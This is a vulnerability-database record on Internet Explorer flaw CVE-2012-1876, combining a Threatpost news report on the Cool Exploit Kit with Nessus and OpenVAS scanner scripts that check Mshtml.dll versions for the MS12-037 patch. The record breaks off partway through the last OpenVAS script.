[reported](<http://blogs.technet.com/b/mmpc/archive/2013/05/07/cve-2012-1876-recent-update-to-the-cool-exploit-kit-landing-page.aspx>) last night the inclusion of [CVE-2012-1876](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876>) in Cool, a vulnerability in IE that was patched last June in [MS12-037](<http://technet.microsoft.com/en-us/security/bulletin/ms12-037>).\n\nThis is a remote code execution heap-based buffer overflow flaw that impacts IE 6-9. Researchers from VUPEN demonstrated a successful exploit during the 2012 Pwn2Own contest that was able to bypass ASLR and DEP data execution protections built into Window. VUPEN\u2019s exploit beat a fully patched version of IE 9 running on a Windows 7 machine.\n\n\u201cThis can be achieved by leaking an address of the mshtml.dll module, building a heap spray based on this address and triggering the vulnerability again to execute the payload,\u201d VUPEN said in a [blogpost](<http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php>) last July, adding that its researchers combined this exploit with another zero-day in order to bypass IE\u2019s Protected mode.\n\n\u201cAfter triggering the vulnerability for a memory leak to disclose interesting addresses, it is possible to trigger the same vulnerability once again to achieve code execution by overflowing the same buffer in memory with arbitrary values,\u201d VUPEN said.\n\nMicrosoft\u2019s Justin Kim said Cool is the only kit to carry the IE exploit.\n\n\u201cFor a while it seemed exploit kit writers were not too interested in this vulnerability,\u201d Kim said.\n\nThe IE exploit is not the only new addition to Cool. Microsoft said Adobe Reader and Flash exploits have also been added ([CVE-2012-0755](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0755>) and [CVE-2013-0634](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634>), respectively). The IE attack, however, opens the spectrum of potential victims because of a return-oriented programming technique that allows it to identify the DLL a process is running on, and match a malicious payload to the corresponding DLL.\n\n\u201cThe exploit includes not only one but 18 different attack payloads, giving attackers the ability to leverage 18 different versions _ofmshtml.dll_. In the past, there was only one payload per exploit targeting one specific version of the module, usually XP system files or several other 3rd-party files that are without address space layout randomization (ASLR) protection enabled,\u201d Kim said. \u201cWith this enhancement in exploit stability, the exploit is capable of exploiting a larger population of victims, including those using Windows Vista and Windows 7.\u201d\n\nThe Cool Exploit Kit was first detected in October in a spate of attacks involving the Reveton ransomware. The [discovery of Cool](<http://malware.dontneedcoffee.com/2012/10/newcoolek.html>) happened after [French researcher Kafeine](<http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html>) discovered an exploit for a Windows vulnerability first exploited by Duqu. The same exploit ended up in the Blackhole Exploit Kit, leading experts to conclude the [same group was running both](<http://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>).\n\nAs for the Adobe-related additions to Cool, the most severe seems to be CVE-2013-0634 for Flash, which was [patched by Adobe in February](<http://threatpost.com/emergency-adobe-flash-player-patched-fix-pair-zero-days-020813/>). The exploit injects websites with malicious .SWF files targeting Firefox and Safari users. This is the same LadyBoyle attack used against targets in the aerospace industry signed with [digital certificates stolen from Asian gaming companies](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>) as outline in the [Winnti research](<http://www.securelist.com/en/blog/208194218/Winnti_Stolen_Digital_Certificates_Used_in_Orphan_Tibetan_Refugee_Children_Caregivers_Attack>) done by Kaspersky Lab. Tibetan activists were also targets of these attacks as well.\n", "modified": "2013-05-08T15:00:45", "published": "2013-05-08T11:00:45", "id": "THREATPOST:0EF2611E64611F9EBB9DD054ABF7473B", "href": "https://threatpost.com/old-ie-attack-finds-its-way-into-cool-exploit-kit/100330/", "type": "threatpost", "title": "Cool Exploit Kit Includes Old Internet Explorer Exploit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T06:18:31", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2699988.\n\nThe installed version of IE is affected by several vulnerabilities\nthat could allow an attacker to execute arbitrary code on the remote\nhost.", "edition": 28, "published": "2012-06-13T00:00:00", "title": "MS12-037: Cumulative Security Update for Internet Explorer (2699988)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS12-037.NASL", "href": "https://www.tenable.com/plugins/nessus/59455", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59455);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2012-1523\",\n \"CVE-2012-1858\",\n \"CVE-2012-1872\",\n \"CVE-2012-1873\",\n \"CVE-2012-1874\",\n \"CVE-2012-1875\",\n \"CVE-2012-1876\",\n \"CVE-2012-1877\",\n \"CVE-2012-1878\",\n \"CVE-2012-1879\",\n \"CVE-2012-1880\",\n \"CVE-2012-1881\",\n \"CVE-2012-1882\"\n );\n script_bugtraq_id(\n 53841,\n 53842,\n 53843,\n 53844,\n 53845,\n 53847,\n 53848,\n 53866,\n 53867,\n 53868,\n 53869,\n 53870,\n 53871\n );\n script_xref(name:\"EDB-ID\", value:\"19777\");\n script_xref(name:\"EDB-ID\", value:\"20174\");\n script_xref(name:\"EDB-ID\", value:\"24017\");\n script_xref(name:\"EDB-ID\", value:\"33944\");\n script_xref(name:\"EDB-ID\", value:\"35815\");\n script_xref(name:\"MSFT\", value:\"MS12-037\");\n script_xref(name:\"MSKB\", value:\"2699988\");\n\n script_name(english:\"MS12-037: Cumulative Security Update for Internet Explorer (2699988)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2699988.\n\nThe installed version of IE is affected by several vulnerabilities\nthat could allow an attacker to execute arbitrary code on the remote\nhost.\");\n # http://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7d49512\");\n # http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18c6adba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-093/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-190/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-192/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-193/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-194/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523185/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523186/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523196/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-037\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS12-037';\nkb = '2699988';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.20551\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.16446\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.21976\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.17824\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21198\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17006\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20551\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16446\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23359\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19272\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22838\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18616\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23345\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19258\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21312\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17110\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.4986\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23345\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19258\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21312\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17110\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6212\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-20T08:50:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.", "modified": "2017-07-05T00:00:00", "published": "2012-06-13T00:00:00", "id": "OPENVAS:902682", "href": "http://plugins.openvas.org/nasl.php?oid=902682", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2699988)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-037.nasl 6526 2017-07-05 05:43:52Z cfischer $\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to gain sensitive\n information or execute arbitrary code in the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x\";\ntag_insight = \"Multiple vulnerabilities are due to the way that Internet Explorer,\n - Handles content using specific strings when sanitizing HTML.\n - Handles EUC-JP character encoding.\n - Processes NULL bytes, which allows to disclose content from the process\n memory.\n - Accesses an object that has been deleted, which allows to corrupt memory\n using Internet Explorer Developer Toolbar.\n - Accesses an object that does not exist, when handling the 'Col' element.\n - Accesses an object that has been deleted, when handling Same ID Property,\n 'Title' element, 'OnBeforeDeactivate' event, 'insertRow' method and\n 'OnRowsInserted' event allows to corrupt memory.\n - Accesses an undefined memory location, when handling the\n 'insertAdjacentText' method allows to corrupt memory.\n - Handles 'Scrolling' event.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-037\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.\";\n\nif(description)\n{\n script_id(902682);\n script_version(\"$Revision: 6526 $\");\n script_cve_id(\"CVE-2012-1523\", \"CVE-2012-1858\", \"CVE-2012-1872\", \"CVE-2012-1873\",\n \"CVE-2012-1874\", \"CVE-2012-1875\", \"CVE-2012-1876\", \"CVE-2012-1877\",\n \"CVE-2012-1878\", \"CVE-2012-1879\", \"CVE-2012-1880\", \"CVE-2012-1881\",\n \"CVE-2012-1882\");\n script_bugtraq_id(53841, 53842, 53843, 53844, 53845, 53847, 53848, 53866,\n 53867, 53868, 53869, 53870, 53871);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 07:43:52 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:16:32 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49412/\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2699988\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027147\");\n script_xref(name : \"URL\" , value : \"http://www.securelist.com/en/advisories/49412\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-037\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(6|7|8|9)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0.2900.0000\", test_version2:\"6.0.2900.6211\")||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0.3790.0000\", test_version2:\"6.0.3790.4985\") ||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18615\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22837\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19271\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23358\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17005\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21197\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.17823\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.21975\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T19:59:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.", "modified": "2020-06-09T00:00:00", "published": "2012-06-13T00:00:00", "id": "OPENVAS:1361412562310902682", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902682", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2699988)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902682\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_cve_id(\"CVE-2012-1523\", \"CVE-2012-1858\", \"CVE-2012-1872\", \"CVE-2012-1873\",\n \"CVE-2012-1874\", \"CVE-2012-1875\", \"CVE-2012-1876\", \"CVE-2012-1877\",\n \"CVE-2012-1878\", \"CVE-2012-1879\", \"CVE-2012-1880\", \"CVE-2012-1881\",\n \"CVE-2012-1882\");\n script_bugtraq_id(53841, 53842, 53843, 53844, 53845, 53847, 53848, 53866,\n 53867, 53868, 53869, 53870, 53871);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:16:32 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to gain sensitive\n information or execute arbitrary code in the context of the application.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x.\");\n\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities are due to the way that Internet Explorer,\n\n - Handles content using specific strings when sanitizing HTML.\n\n - Handles EUC-JP character encoding.\n\n - Processes NULL bytes, which allows to disclose content from the process\n memory.\n\n - Accesses an object that has been deleted, which allows to corrupt memory\n using Internet Explorer Developer Toolbar.\n\n - Accesses an object that does not exist, when handling the 'Col' element.\n\n - Accesses an object that has been deleted, when handling Same ID Property,\n 'Title' element, 'OnBeforeDeactivate' event, 'insertRow' method and\n 'OnRowsInserted' event allows to corrupt memory.\n\n - Accesses an undefined memory location, when handling the\n 'insertAdjacentText' method allows to corrupt memory.\n\n - Handles 'Scrolling' event.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2699988\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027147\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/49412\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-037\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || ieVer !~ \"^[6-9]\\.\"){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"6.0.2900.0000\", test_version2:\"6.0.2900.6211\")||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", 